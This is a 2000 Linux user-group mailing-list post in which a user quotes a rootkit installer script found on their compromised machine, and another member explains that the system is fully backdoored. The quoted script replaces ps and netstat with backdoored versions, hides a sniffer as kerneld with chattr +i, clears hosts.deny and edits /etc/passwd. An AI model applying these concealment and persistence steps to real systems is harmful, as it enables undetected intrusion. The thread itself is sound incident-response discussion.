[lug] What does this mean?

D. Stimits stimits at idcomm.com
Tue Mar 21 18:26:10 MST 2000 

nunar at mauromedia.net wrote:
> 
> After some investigating, I managed to get a hold of the utility that was run on my system.
> What is this doing? Please bear with me :)
> Thanks,
> Shannon
> 
> # !/bin/sh
> #
> # echo "* [ m O s ( l i n u x r k ) ] "
> # echo "* beginning installation "
> # if [ "`grep ALL /etc/hosts.deny`" ]; then
> #   echo "* cleaning hosts.deny, ALL found "
> #   mv -f /etc/hosts.deny /etc/host.deny
> # fi
> #
> # ./setssh
> #
> # echo "* moving backdoors - netstat, ps "
> # ./fix /bin/ps backdoor/ps /usr/lib/ldlibps.so
> # ./fix /bin/netstat backdoor/netstat /usr/lib/ldlibstat.so
> #
> # echo "* moving files "
> # mkdir -p /dev/sdd0
> # mv .lib/anGsniff /usr/sbin/kerneld
> # chattr +i /usr/sbin/kerneld
> # mv .lib/* /dev/sdd0 -f
> #
> # echo "* rehashing inetd "
> # killall -HUP inetd
> #
> # echo "* grepping cronexpl out of passwd "
> # grep -v cronexpl /etc/passwd >k
> # mv -f k /etc/passwd
> #
> # host=`hostname -f`
> # ip=`hostname -i`
> # hosts=`/sbin/ifconfig | grep "inet addr:" | wc -l`
> # bogo=`grep bogomips /proc/cpuinfo|awk -F ' ' '{ print $3 }'`
> # cpu=`uname -m`
> # let hostz=$(($hosts - 1))
> # uptime=`uptime|awk -F ' ' '{ print $3 }'`
> # totmem=`free | grep Mem: | awk -F ' ' '{ print $2 }'`
> # fremem=`free | grep Mem: | awk -F ' ' '{ print $4 }'`
> # rm -fr /tmp/lerka
> # echo " * system info:"
> # echo "  * uptime:    ${uptime} days "
> # echo "  * cpu:       ${cpu} "
> # echo "  * bmp:       ${bogo} "
> # echo "  * ips:       ${hostz} "
> # echo "  * total mem: ${totmem} "
> # echo "  * free  mem: ${fremem} "
> # echo "  * addr:      ${host} / ${ip} "
> # echo " * done "
> # rm -rf ../ac ../ler ../ak.tgz
> # if [ `ps x | grep sshd` == "" ]; then
> #   /usr/sbin/sshd
> #   ps x|grep sshd
> # fi
> # ps x | grep sshd
> # cd /dev/sdd0
> # nohup ./more >>/dev/null &
> # /usr/sbin/kerneld
> 
> Download NeoPlanet at http://www.neoplanet.com
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

It means all of your system abilities to detect and deny them have
been altered. Even secure shell was fixed to help them, which means
even snooping won't tell you what they are doing. You can't trust your
system connected to any network now. Likely a totally successful root
kit install, with access to anything and everything. Should you add
denial or firewalling against this person, very likely it will only
*tell* you that you are successful. Serious stuff.

More information about the LUG mailing list